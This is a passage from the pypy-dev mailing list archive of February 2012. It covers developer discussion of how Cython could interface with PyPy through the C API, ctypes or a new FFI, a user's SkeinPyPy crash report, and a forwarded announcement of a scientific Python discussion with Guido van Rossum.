I remain convinced that the best approach for Cython >> on PyPy is instead to have Cython generate pure Python code that would >> use some API in the form of a built-in Python module. > > For what it's worth, it would work if the Cython sources (or even the > C intermediate sources) were "compiled" into any custom bytecode, not > necessarily Python's. We would then write a simple interpreter for it > in RPython, which looks kind of easy. It may seem strange, but it's > actually similar to regular expressions. > > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) I can't see how this approach would solve the problem, at least not how it's better than anything else. 1) assembly is an extremely low level interface that looses tons of code semantics, which makes it hard to run such code efficiently 2) it doesn't take away the need for C-API interaction, which means that this API still needs to be implemented completely, in one way or another Stefan From stefan_ml at behnel.de Tue Feb 14 14:12:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 14:12:09 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 13:13: > the main problem is that the RPython-to-C translation that we > do is not just a one-format traduction. We need to tweak the > intermediate code in various ways depending on various settings. The > way it is tweaked really depends on these settings in a way that > cannot be captured just by C macros. (If it could, we might have > written the whole project in C instead of RPython in the first place.) > You would end up with a version of the Cython C code that only works > on *some* kind of PyPy, like using the minimark GC, without any JIT > support, and without sandboxing support. (Just to add an example, I > could also say "and without stackless support", but this is no longer > true nowadays because we no longer rely on a transformation for > stackless.) Hmm, if that is so, how would you ever want to make PyPy bidirectionally interface with anything at all? How does ctypes even work in PyPy? Is it just that you're lucky that ctypes can be controlled completely from within PyPy and doesn't let any internals leak into the outside world? Then how is rffi supposed to do it better? And how are you planning to export numpypy buffers to non-PyPy code? It's one thing to export low-level data and simple C functions etc. to external code. However, the open C-API of CPython is a serious part of its success story. It's not just legacy code that uses it, it continues to be an important part of the platform. If PyPy can't have such an API, that's a serious drawback of the architecture. Stefan From fijall at gmail.com Tue Feb 14 14:21:32 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 15:21:32 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 3:12 PM, Stefan Behnel wrote: > Armin Rigo, 14.02.2012 13:13: >> the main problem is that the RPython-to-C translation that we >> do is not just a one-format traduction. ?We need to tweak the >> intermediate code in various ways depending on various settings. ?The >> way it is tweaked really depends on these settings in a way that >> cannot be captured just by C macros. ?(If it could, we might have >> written the whole project in C instead of RPython in the first place.) >> ?You would end up with a version of the Cython C code that only works >> on *some* kind of PyPy, like using the minimark GC, without any JIT >> support, and without sandboxing support. ?(Just to add an example, I >> could also say "and without stackless support", but this is no longer >> true nowadays because we no longer rely on a transformation for >> stackless.) > > Hmm, if that is so, how would you ever want to make PyPy bidirectionally > interface with anything at all? How does ctypes even work in PyPy? Is it > just that you're lucky that ctypes can be controlled completely from within > PyPy and doesn't let any internals leak into the outside world? Then how is > rffi supposed to do it better? And how are you planning to export numpypy > buffers to non-PyPy code? > > It's one thing to export low-level data and simple C functions etc. to > external code. However, the open C-API of CPython is a serious part of its > success story. It's not just legacy code that uses it, it continues to be > an important part of the platform. If PyPy can't have such an API, that's a > serious drawback of the architecture. > > Stefan I think CPython C API is a serious part of it's success because it's "good enough for a lot of cases" not because it's necessary for it's success. In my opinion a decent FFI (not ctypes, I mean a decent one) and better performance would eliminate this need completely. From our perspective then, CPython C API is just legacy. From anto.cuni at gmail.com Tue Feb 14 14:24:31 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 14:24:31 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3A608F.80000@gmail.com> On 02/14/2012 02:21 PM, Maciej Fijalkowski wrote: > I think CPython C API is a serious part of it's success because it's > "good enough for a lot of cases" not because it's necessary for it's > success. In my opinion a decent FFI (not ctypes, I mean a decent one) > and better performance would eliminate this need completely. From our > perspective then, CPython C API is just legacy. well, a C API is still needed if you want to embed the interpreter inside a larger C program, but PyPy doesn't offer it (yet?). I agree that for the use case of calling external code (which is what we are discussing right now), a good ffi + a good JIT should eliminate the need the C API. ciao, Anto From faassen at startifact.com Tue Feb 14 14:47:21 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 14:47:21 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A608F.80000@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hi there, So if I understand the direction of this discussion correctly, it is suggested that to interface PyPy with Cython in a non-hackish way the best strategy might be to modify Cython to generate Python code. This way, there's no need to expose all sorts of PyPy internals on a C API level, and Cython generated code could benefit from the JIT. This would essentially solve the problem for any code in Cython that didn't talk to any C APIs. But Cython-based code does talk to C APIs, so there is a problem. Python code in PyPy needs to be able to interface with C APIs first in order to generate the right stuff from Cython. ctypes is not considered to be a decent way to integrate PyPy with C APIs. A decent foreign function interface for PyPy would be needed first, or alternatively one that's specifically written for the concerns of Cython. Did I get this right? So what would be required to create a decent FFI this nature? What would make it decent? How could Cython's experience interfacing with C help to design this? Regards, Martijn From daid303 at gmail.com Tue Feb 14 15:05:51 2012 From: daid303 at gmail.com (Daid) Date: Tue, 14 Feb 2012 15:05:51 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: You don't check you email for a few days and this happens... For the pypy-dev people. This is about SkeinPyPy, a pre-packaged Python software package I made, which comes with PyPy. https://github.com/daid/SkeinPyPy The packaged version was 1.7 for the Alpha2 and Alpha3. And pypy-1.8 for Alpha4. I don't even know why Frans added more people to this mail "conversation", all I got was a email saying that something was not working, and a screenshot with a picture showing that it was working. Guess because PyPy crashed, and I didn't answer within a day he went looking for other help. To reproduce this problem you would need quite a few items. (And seeing the... quality of Frans his communications I highly doubt I will get them). The SkeinPyPy package, the STL file, and the "configuration profile" would be needed. But, this might not be a PyPy problem per say, I've seen PyPy1.7 crash before because of bad python code (the code base is pretty large, and it has many configuration options), it might have taken a code path that would have caused an exception with normal python code. (Could also be seen as bug in PyPy) And as last possibility, his PC hardware could be damaged. As the bug doesn't always happen (as far as I can see from his confusing emails) I hope this cleared a thing or 2 up. Keep up the great work, pypy is awesome :D Frans de jong, Are you using SkeinPyP Alpha4 or an earlier version? If the version is outdated, use Alpha4. Also, try running the same slice, but first rename the "pypy" folder to something else. This will disable the pypy engine and will run everything in normal Python. If that works then there is a pypy bug. Else we have a bug in Skeinforge. Also, don't be afraid to type more then 1 sentence. You can never give enough information when you have problems like this. PS. If you are dutch (which has a high posibility with that name), and your dutch is better then your english. You may email me. But JUST me, don't add other people, in dutch. On Mon, Feb 13, 2012 at 11:17 AM, Armin Rigo wrote: > Hi Frans, > > Thank you, but we need to know at least: > > - the version of PyPy (is it the official PyPy 1.8?); > - the program that is started (and how to install it, if complicated); > - and for reference, the OS --- I guess Windows from the dump of Amaury. > > Also, I don't find yesterday's conversation with you. Can you explain > where it was (nickname if on IRC, etc.)? > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Tue Feb 14 15:49:28 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 15:49:28 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: Hi, Frans answered with more details but in a private mail to me. I copied it to the following bug report: https://bugs.pypy.org/issue1045 This is really a pypy bug, because it should not be possible to get a "RPython error: AssertionError". It shows that an assert in the PyPy source code triggered (in the JIT optimizer, based on the file names). But of course it might be hard to reproduce without all the information. A bient?t, Armin. From arigo at tunes.org Tue Feb 14 15:59:30 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 15:59:30 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A523C.6040600@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A523C.6040600@gmail.com> Message-ID: Hi Antonio, On Tue, Feb 14, 2012 at 13:23, Antonio Cuni wrote: > this approach would work for all C extensions then, not just Cython's one, > right? No. Or maybe yes, but with much more work. I'm suggesting to take specifically the Cython-produced C files, with all macros redefined to strange things detectable in the MIPS assembler. We only need to interpret the MIPS-compiled version of C code *produced by Cython and using our strange macros*, which is probably much easier than interpreting random compiled C code. Amaury wrote: > Are you suggesting something similar to emscripten? > A LLVM-to-RPython compiler! > :-) Yes, that might work with LLVM too, but not as a compiler producing RPython; as an interpreter written in RPython, that would interpret some custom format derived (maybe) from LLVM's. Or, for all I know, maybe it's possible and not too much work to have just a full interpreter for LLVM bytecode. :-) It all sounds far-fetched, but maybe it's not. A bient?t, Armin. From arigo at tunes.org Tue Feb 14 16:12:16 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 16:12:16 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Stefan, On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: > Hmm, if that is so, how would you ever want to make PyPy bidirectionally > interface with anything at all? How does ctypes even work in PyPy? I believe you are not understanding my point. Obviously ctypes works in PyPy, and not, I believe, in a particularly "lucky" way at all. It works by not being written as C code at all, but as (Python and) RPython code. The difference of levels between C and RPython is essential in PyPy. I just gave tons of examples of why it is so. I know it's not a perfect solution for everybody; but we think that writing C code (or generating it straight from something else) is not the most flexible way to develop software. You may not agree with that, and you're free too; but consider that we would be unlikely to have a JIT in PyPy at all without the approach we took, so we think there is some merit in it. Note that I'm pushing so much for a Cython that would emit Python code instead of C --- but that's mostly for performance reasons on top of PyPy. The alternative, which is quicker and only slightly more hackish, is to complete the C API of cpyext in PyPy until it works well enough. Don't come complaining "it's slow", though. It *is* going to be slow. A bient?t, Armin. From arigo at tunes.org Tue Feb 14 16:19:54 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 16:19:54 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hi Martijn, On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: > But Cython-based code does talk to C APIs, so there is a problem. > Python code in PyPy needs to be able to interface with C APIs first in > order to generate the right stuff from Cython. That's not necessarily hard. I believe that Cython code like this: PyObject *x = PyDict_GetItem(y, key) can correspond "faithfully" to Python code like that --- if we assume that 'y' contains really a dict: x = y[key] I don't know to what extend the whole C API can be mapped back to Python, but certainly the most common functions can. A bient?t, Armin. From markflorisson88 at gmail.com Tue Feb 14 16:22:52 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:22:52 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On 14 February 2012 13:21, Maciej Fijalkowski wrote: > On Tue, Feb 14, 2012 at 3:12 PM, Stefan Behnel wrote: >> Armin Rigo, 14.02.2012 13:13: >>> the main problem is that the RPython-to-C translation that we >>> do is not just a one-format traduction. ?We need to tweak the >>> intermediate code in various ways depending on various settings. ?The >>> way it is tweaked really depends on these settings in a way that >>> cannot be captured just by C macros. ?(If it could, we might have >>> written the whole project in C instead of RPython in the first place.) >>> ?You would end up with a version of the Cython C code that only works >>> on *some* kind of PyPy, like using the minimark GC, without any JIT >>> support, and without sandboxing support. ?(Just to add an example, I >>> could also say "and without stackless support", but this is no longer >>> true nowadays because we no longer rely on a transformation for >>> stackless.) >> >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? Is it >> just that you're lucky that ctypes can be controlled completely from within >> PyPy and doesn't let any internals leak into the outside world? Then how is >> rffi supposed to do it better? And how are you planning to export numpypy >> buffers to non-PyPy code? >> >> It's one thing to export low-level data and simple C functions etc. to >> external code. However, the open C-API of CPython is a serious part of its >> success story. It's not just legacy code that uses it, it continues to be >> an important part of the platform. If PyPy can't have such an API, that's a >> serious drawback of the architecture. >> >> Stefan > > I think CPython C API is a serious part of it's success because it's > "good enough for a lot of cases" not because it's necessary for it's > success. In my opinion a decent FFI (not ctypes, I mean a decent one) > and better performance would eliminate this need completely. From our > perspective then, CPython C API is just legacy. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Yes, I don't think the full C API is a necessity, although it would be convenient for Cython. Compiling to pure python (+ctypes) (or python bytecode, which wouldn't really be much easier or harder) is possible for the obvious cases, but there are areas where it could be tricky: 1) C++ support (http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html) Perhaps the code could be wrapped in an API with external C linkage, callable through ctypes. 2) cdef (C) functions as C callbacks For cdef functions called from Cython simply generate a python function. When you take the address of a cdef function, you get the address to an actual C function that constructs ctypes objects holding a pointer to the arguments and the return value that it passes to a python function. Perhaps for a nogil function original Cython mechanics could be used if there is no with gil block present, or any function calls declared with the generic 'except *' clause. 3) managing the GIL You can't really release the GIL in python code, and if most of your Cython code isn't actual C code, releasing the GIL won't be feasible. Through ctypes one could release the GIL, but nogil blocks are much more coarse grained than that (perhaps nogil blocks should be compiled to C functions, which are called through a ctypes GIL-releasing call?). Or maybe explicit releases should just be ignored. 4) buffers (http://docs.cython.org/src/tutorial/numpy.html and https://sage.math.washington.edu:8091/hudson/job/cython-docs/doclinks/1/src/userguide/memoryviews.html) Buffers could perhaps be addressed by type-checks only to check matching dtypes as well as contiguity constraints (and some other features, like obtaining a memoryview of C data etc (numpy.ctypeslib.as_array?)), but leaving the rest purely to (num)pypy. 5) parallelism (http://docs.cython.org/src/userguide/parallelism.html) This could just be sequential, as it is now in pure-python mode. Under this model I think the first three points are particularly though. Could RPython in any way alleviate the countless problems with this approach (and how?), and would it allow the flexibility to implement these features, or part of them? Going the python + ctypes way through to the end, and supporting all the features, will be a lot of work. Also, I see how much code could be compiled to pure-python (+ctypes), but I'm pretty sure not all code could be handled this way. The code that can't be handled will need to call back into pypy somehow, which would mandate a small (but existing) C API. From faassen at startifact.com Tue Feb 14 16:25:42 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 16:25:42 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 4:19 PM, Armin Rigo wrote: > Hi Martijn, > > On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: >> But Cython-based code does talk to C APIs, so there is a problem. >> Python code in PyPy needs to be able to interface with C APIs first in >> order to generate the right stuff from Cython. > > That's not necessarily hard. ?I believe that Cython code like this: > > ? PyObject *x = PyDict_GetItem(y, key) > > can correspond "faithfully" to Python code like that --- if we assume > that 'y' contains really a dict: > > ? x = y[key] > > I don't know to what extend the whole C API can be mapped back to > Python, but certainly the most common functions can. Yes, that's the Python C API, but I was talking about other C APIs. Take lxml, which uses the libxml2 APIs. There is no way to map that to Python unless you use something like ctypes (but ctypes is not considered to be right for this purpose). Regards, Martijn From markflorisson88 at gmail.com Tue Feb 14 16:26:14 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:26:14 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On 14 February 2012 15:12, Armin Rigo wrote: > Hi Stefan, > > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point. ?Obviously ctypes works > in PyPy, and not, I believe, in a particularly "lucky" way at all. ?It > works by not being written as C code at all, but as (Python and) > RPython code. ?The difference of levels between C and RPython is > essential in PyPy. ?I just gave tons of examples of why it is so. ?I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. ?You may not agree with > that, and you're free too; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it. > > Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. ?The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. ?Don't come complaining "it's slow", though. ?It *is* > going to be slow. > Insofar as that is feasible all the way through (and not just python + a nicer way to call C functions), that would be great. However, any attempt in this direction will be very involved, whereas I think people would be quite happy already to see anything work completely. Getting all features to work is at least a lot more important than any performance issues (assuming it won't be horrendously slow :). > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From markflorisson88 at gmail.com Tue Feb 14 16:28:18 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:28:18 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: On 14 February 2012 15:25, Martijn Faassen wrote: > On Tue, Feb 14, 2012 at 4:19 PM, Armin Rigo wrote: >> Hi Martijn, >> >> On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: >>> But Cython-based code does talk to C APIs, so there is a problem. >>> Python code in PyPy needs to be able to interface with C APIs first in >>> order to generate the right stuff from Cython. >> >> That's not necessarily hard. ?I believe that Cython code like this: >> >> ? PyObject *x = PyDict_GetItem(y, key) >> >> can correspond "faithfully" to Python code like that --- if we assume >> that 'y' contains really a dict: >> >> ? x = y[key] >> >> I don't know to what extend the whole C API can be mapped back to >> Python, but certainly the most common functions can. > > Yes, that's the Python C API, but I was talking about other C APIs. > Take lxml, which uses the libxml2 APIs. > > There is no way to map that to Python unless you use something like > ctypes (but ctypes is not considered to be right for this purpose). Why is ctypes not right? Cython could actually generate a C function with a known interface, that proxies the actual C function. That code would be compiled by the C compiler, and any C API changes would prevent the module from compiling. It would also take care of any promotions etc on the C level. > Regards, > > Martijn > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From jfcgauss at gmail.com Tue Feb 14 16:35:54 2012 From: jfcgauss at gmail.com (Serhat Sevki Dincer) Date: Tue, 14 Feb 2012 17:35:54 +0200 Subject: [pypy-dev] Fwd: Discussion with Guido van Rossum and (hopefully) core python-dev on scientific Python and Python3 Message-ID: I will take the liberty to forward this topic on "scientific python" to pypy list, since numpy work on pypy has progressed a lot, apparently, and it does concern pypy too, i guess.. Date: Mon, 13 Feb 2012 13:55:45 -0800 From: Fernando Perez Subject: [Matplotlib-users] Discussion with Guido van Rossum and ? ? ? ?(hopefully) core python-dev on scientific Python and Python3 To: Discussion of Numerical Python Cc: sage-devel , ? cython-users ? ? ? ?, ? ? ? ?SciPy Users List ? ? ? ?, networkx-discuss ? ? ? ?, ? ?enthought-dev ? ? ? ?, ? ? SciPy Developers List ? ? ? ?, ?Core developer mailing list of the Cython ? ? ? ?compiler ? ? ? ?, ? ? ?matplotlib development list ? ? ? ?, ? ? ? IPython Development list ? ? ? ?, ? ? ? ?IPython User list , ? ? ? ?pystatsmodels at googlegroups.com, Matplotlib Users ? ? ? ? Message-ID: ? ? ? ? Content-Type: text/plain; charset=ISO-8859-1 Hi folks, [ I'm broadcasting this widely for maximum reach, but I'd appreciate it if replies can be kept to the *numpy* list, which is sort of the 'base' list for scientific/numerical work. ?It will make it much easier to organize a coherent set of notes later on. ?Apology if you're subscribed to all and get it 10 times. ] As part of the PyData workshop (http://pydataworkshop.eventbrite.com) to be held March 2 and 3 at the Mountain View Google offices, we have scheduled a session for an open discussion with Guido van Rossum and hopefully as many core python-dev members who can make it. ?We wanted to seize the combined opportunity of the PyData workshop bringing a number of 'scipy people' to Google with the timeline for Python 3.3, the first release after the Python language moratorium, being within sight: http://www.python.org/dev/peps/pep-0398. While a number of scientific Python packages are already available for Python 3 (either in released form or in their master git branches), it's fair to say that there hasn't been a major transition of the scientific community to Python3. ?Since there is no more development being done on the Python2 series, eventually we will all want to find ways to make this transition, and we think that this is an excellent time to engage the core python development team and consider ideas that would make Python3 generally a more appealing language for scientific work. ?Guido has made it clear that he doesn't speak for the day-to-day development of Python anymore, so we all should be aware that any ideas that come out of this panel will still need to be discussed with python-dev itself via standard mechanisms before anything is implemented. ?Nonetheless, the opportunity for a solid face-to-face dialog for brainstorming was too good to pass up. The purpose of this email is then to solicit, from all of our community, ideas for this discussion. ?In a week or so we'll need to summarize the main points brought up here and make a more concrete agenda out of it; I will also post a summary of the meeting afterwards here. Anything is a valid topic, some points just to get the conversation started: - Extra operators/PEP 225. ?Here's a summary from the last time we went over this, years ago at Scipy 2008: http://mail.scipy.org/pipermail/numpy-discussion/2008-October/038234.html, and the current status of the document we wrote about it is here: file:///home/fperez/www/site/_build/html/py4science/numpy-pep225/numpy-pep225.html. - Improved syntax/support for rationals or decimal literals? ?While Python now has both decimals (http://docs.python.org/library/decimal.html) and rationals (http://docs.python.org/library/fractions.html), they're quite clunky to use because they require full constructor calls. ?Guido has mentioned in previous discussions toying with ideas about support for different kinds of numeric literals... - Using the numpy docstring standard python-wide, and thus having python improve the pathetic state of the stdlib's docstrings? ?This is an area where our community is light years ahead of the standard library, but we'd all benefit from Python itself improving on this front. ?I'm toying with the idea of giving a lighting talk at PyConn about this, comparing the great, robust culture and tools of good docstrings across the Scipy ecosystem with the sad, sad state of docstrings in the stdlib. ?It might spur some movement on that front from the stdlib authors, esp. if the core python-dev team realizes the value and benefit it can bring (at relatively low cost, given how most of the information does exist, it's just in the wrong places). ?But more importantly for us, if there was truly a universal standard for high-quality docstrings across Python projects, building good documentation/help machinery would be a lot easier, as we'd know what to expect and search for (such as rendering them nicely in the ipython notebook, providing high-quality cross-project help search, etc). - Literal syntax for arrays? ?Sage has been floating a discussion about a literal matrix syntax (https://groups.google.com/forum/#!topic/sage-devel/mzwepqZBHnA). ?For something like this to go into python in any meaningful way there would have to be core multidimensional arrays in the language, but perhaps it's time to think about a piece of the numpy array itself into Python? ?This is one of the more 'out there' ideas, but after all, that's the point of a discussion like this, especially considering we'll have both Travis and Guido in one room. - Other syntactic sugar? Sage has "a..b" <=> range(a, b+1), which I actually think is ?both nice and useful... There's also the question of allowing "a:b:c" notation outside of [], which has come up a few times in conversation over the last few years. Others? - The packaging quagmire? ?This continues to be a problem, though python3 does have new improvements to distutils. ?I'm not really up to speed on the situation, to be frank. ?If we want to bring this up, someone will have to provide a solid reference or volunteer to do it in person. - etc... I'm putting the above just to *start* the discussion, but the real point is for the rest of the community to contribute ideas, so don't be shy. Final note: while I am here commiting to organizing and presenting this at the discussion with Guido (as well as contacting python-dev), I would greatly appreciate help with the task of summarizing this prior to the meeting as I'm pretty badly swamped in the run-in to pydata/pycon. ?So if anyone is willing to help draft the summary as the date draws closer (we can put it up on a github wiki, gist, whatever), I will be very grateful. ?I'm sure it will be better than what I'll otherwise do the last night at 2am :) Cheers, f ps - to the obvious question about webcasting the discussion live for remote participation: yes, we looked into it already; no, unfortunately it appears it won't be possible. ?We'll try to at least have the audio recorded (and possibly video) for posting later on. pps- if you are close to Mountain View and are interested in attending this panel in person, drop me a line at fernando.perez at berkeley.edu. We have a few spots available *for this discussion only* on top of the pydata regular attendance (which is long closed, I'm afraid). ?But we'll need to provide Google with a list of those attendees in advance. ?Please indicate if you are a core python committer in your email, as we'll give priority for this overflow pool to core python developers (but will otherwise accommodate as many people as Google lets us). From wlavrijsen at lbl.gov Tue Feb 14 16:54:53 2012 From: wlavrijsen at lbl.gov (wlavrijsen at lbl.gov) Date: Tue, 14 Feb 2012 07:54:53 -0800 (PST) Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi, On Tue, 14 Feb 2012, mark florisson wrote: > 1) C++ support > (http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html) [.. snip ..] > Under this model I think the first three points are particularly > though. Could RPython in any way alleviate the countless problems with > this approach (and how?), and would it allow the flexibility to > implement these features, or part of them? for the first, the bulk is there (or at least to an extend that exceeds what is described in the above link; C++ is a large language ... ) in the cppyy module (reflex-support branch). The C++ description info need not come from reflex (the medium term goal is to have it come from LLVM IR), and could be filled in from yet another source, e.g. by something that is generated from cython. All representation of C++ objects as well as dispatching is in rpython code, only the access to the C++ description comes from a C api. Not saying that it is what you're looking for, nor disagreeing that it is "particularly tough" (it's taking a long time, after all). But it's there and it works, proving that it can be done. Best regards, Wim -- WLavrijsen at lbl.gov -- +1 (510) 486 6411 -- www.lavrijsen.net From arigo at tunes.org Tue Feb 14 17:01:35 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 17:01:35 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Mark, On Tue, Feb 14, 2012 at 16:22, mark florisson wrote: > (...) Going the python + ctypes way through to the end, > and supporting all the features, will be a lot of work. (...) I think that your points are valid and need to be carefully considered. I was taking a bit of an extreme opposite stance here for the purpose of explaining the pros and cons that I see. I have no definite answer to any of various good questions. I think that it's going to be a lot of work anyway. And also, more importantly, it seems to me from the discussions here that involved people (including me) are ready to talk but not to code, so well. In the end it's up to someone with real motivation to choose the approach he likes best and implement it. A bient?t, Armin. From fijall at gmail.com Tue Feb 14 17:04:29 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 18:04:29 +0200 Subject: [pypy-dev] Fwd: Discussion with Guido van Rossum and (hopefully) core python-dev on scientific Python and Python3 In-Reply-To: References: Message-ID: On Tue, Feb 14, 2012 at 5:35 PM, Serhat Sevki Dincer wrote: > I will take the liberty to forward this topic on "scientific python" > to pypy list, since numpy work on pypy has progressed a lot, > apparently, and it does concern pypy too, i guess.. Note - I know I'm replying to pypy-dev instead of numpy dev on purpose. We as in PyPy are not very interested in the language design decisions. In fact it's in our opinion much better to leave the language decisions to someone else and we'll continue to just improve performance and other aspects that are language-unrelated. In fact this is what got pypy to the place where it is right now - compatibility was a major issue from day 1. The same applies to numpy - we're committed to making numpy exactly the same as the original numpy in terms of API without really changing it, hence we're not that interested in participating in the discussion. That said, the only thing we really dislike about language decisions are changing syntax/semantics to improve performance. We believe readability should never be sacrificed in favor of performance, but this is roughly it. We'll happily let other people decide what's the best syntax for numpy. Cheers, fijal From faassen at startifact.com Tue Feb 14 17:04:56 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 17:04:56 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hey, On Tue, Feb 14, 2012 at 4:28 PM, mark florisson wrote: [snip] >> There is no way to map that to Python unless you use something like >> ctypes (but ctypes is not considered to be right for this purpose). > > Why is ctypes not right? Cython could actually generate a C function > with a known interface, that proxies the actual C function. That code > would be compiled by the C compiler, and any C API changes would > prevent the module from compiling. It would also take care of any > promotions etc on the C level. I don't know but this was what people said. I'm hoping someone will explain why a new FFI story would be needed. Regards, Martijn From daid303 at gmail.com Tue Feb 14 17:17:46 2012 From: daid303 at gmail.com (Daid) Date: Tue, 14 Feb 2012 17:17:46 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: Hi, Ok. In that case, to reproduce, you'll need the "STL" file from Frans. And his ".skeinforge_pypy" folder from C:\documents and settings/[USER]/ (this contains all the configuration settings, cross platform compatible, needs to be in $HOME) And the SkeinPyPy release from github. If I encounter an error like that again I'll see if I can make a nice reproducible package for you guys. On Tue, Feb 14, 2012 at 3:49 PM, Armin Rigo wrote: > Hi, > > Frans answered with more details but in a private mail to me. I > copied it to the following bug report: > > https://bugs.pypy.org/issue1045 > > This is really a pypy bug, because it should not be possible to get a > "RPython error: AssertionError". It shows that an assert in the PyPy > source code triggered (in the JIT optimizer, based on the file names). > > But of course it might be hard to reproduce without all the information. > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Tue Feb 14 18:24:44 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 18:24:44 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 16:12: > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point. Obviously ctypes works > in PyPy, and not, I 